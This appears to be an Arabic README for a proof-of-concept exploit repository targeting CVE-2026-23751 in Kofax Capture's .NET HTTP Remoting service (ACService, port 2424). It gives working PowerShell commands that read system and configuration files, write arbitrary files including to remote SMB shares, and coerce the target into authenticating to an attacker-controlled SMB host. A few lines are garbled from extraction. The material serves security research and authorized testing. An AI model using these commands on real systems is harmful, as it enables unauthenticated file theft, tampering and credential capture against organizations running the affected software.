
عميل RemotingClient مُرقَّع لاستغلال CVE-2026-23751 (أتمتة التنغستن - Kofax Capture قراءة/كتابة ملفات غير مصادق عليها وإكراه SMB عبر .NET HTTP Remoting)
إعادة تنفيذ لإثبات المفهوم للتقنية الموصوفة في Code White's NewRemotingTricks، تستهدف Tungsten Automation Kofax Capture.
العنوان: Tungsten Automation - Kofax Capture قراءة/كتابة ملفات غير مصادق عليها وإجبار SMB عبر .NET HTTP Remoting
CVE: CVE-2026-23751
يؤثر CVE-2026-23751 على Tungsten Automation Kofax Capture ويسمح لمهاجم عن بُعد غير مصادق بالتفاعل مع نقطة نهاية .NET HTTP Remoting المكشوفة بواسطة خدمة ACService الخاصة بـ Kofax Capture.
يمكن استغلال الثغرة لتنفيذ ما يلي:
يعيد إثبات المفهوم تنفيذ تقنية .NET Remoting ذات الصلة من مشروع Code White's NewRemotingTricks.
يستهدف إثبات المفهوم نقطة نهاية HTTP Remoting الخاصة بخدمة ACService في Kofax Capture:
http://<target>:2424/ACService
المنفذ 2424 هو منفذ HTTP Remoting الافتراضي المستخدم بواسطة الخدمة المتأثرة.
المثال التالي يقرأ ملف hosts الخاص بنظام Windows من الهدف:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts
يمكن قراءة ملف إعدادات Kofax Capture بالمثل:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml
يمكن كتابة ملف إلى موقع يمكن لخدمة Kofax Capture الوصول إليه عن طريق توفير المسار الهدف متبوعًا بالمحتوى:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld
يمكن استخدام نفس الوظيفة مع مسار UNC للكتابة إلى مشاركة SMB عن بُعد:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld
تعتمد القدرة على الوصول إلى المورد البعيد على صلاحيات وسياق الأمان الخاص بخدمة Kofax Capture.
يمكن توفير URI بصيغة file:// لدفع الهدف للوصول إلى مورد SMB عن بُعد:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt
يمكن أن يؤدي هذا إلى مصادقة المضيف المتأثر على خادم SMB الذي يتحكم فيه المهاجم، اعتمادًا على البيئة المستهدفة وإعدادات الأمان الخاصة بها.
تتضمن الثغرة استخدام .NET HTTP Remoting بواسطة خدمة ACService الخاصة بـ Kofax Capture.
يدعم .NET Remoting مخططات URI متنوعة وآليات تسلسل الكائنات. من خلال التفاعل مع نقطة نهاية remoting المكشوفة بطريقة محددة، يمكن لعميل غير مصادق أن يتسبب في قيام الخدمة بتنفيذ عمليات على نظام الملفات باستخدام مسارات يقدمها العميل.
يوضح إثبات المفهوم كيف يمكن استخدام هذا السلوك من أجل:
file:// البعيدةيوضح إثبات المفهوم حاليًا كتابة بيانات نصية إلى الملفات. يمكن دعم أنواع ملفات وتنسيقات حمولات أخرى عن طريق تعديل الكود المصدري وفقًا لذلك.
يعتمد هذا التنفيذ على الأبحاث والتقنيات المقدمة في:
Code White - NewRemotingTricks
ACService الخاصة بـ Kofax Capture على الهدفRemotingClient_MBRO_Lazy.exeلا تتطلب عملية الاستغلال أي مصادقة على خدمة Kofax Capture.
تم توفير هذا المستودع لأغراض البحث الأمني، والتحقق من الثغرات، واختبار الاختراق المصرح به فقط.
لا تستخدم إثبات المفهوم هذا ضد الأنظمة دون إذن صريح. المؤلف غير مسؤول عن الأضرار، أو فقدان البيانات، أو الوصول غير المصرح به، أو أي عواقب أخرى ناتجة عن سوء استخدام هذا البرنامج.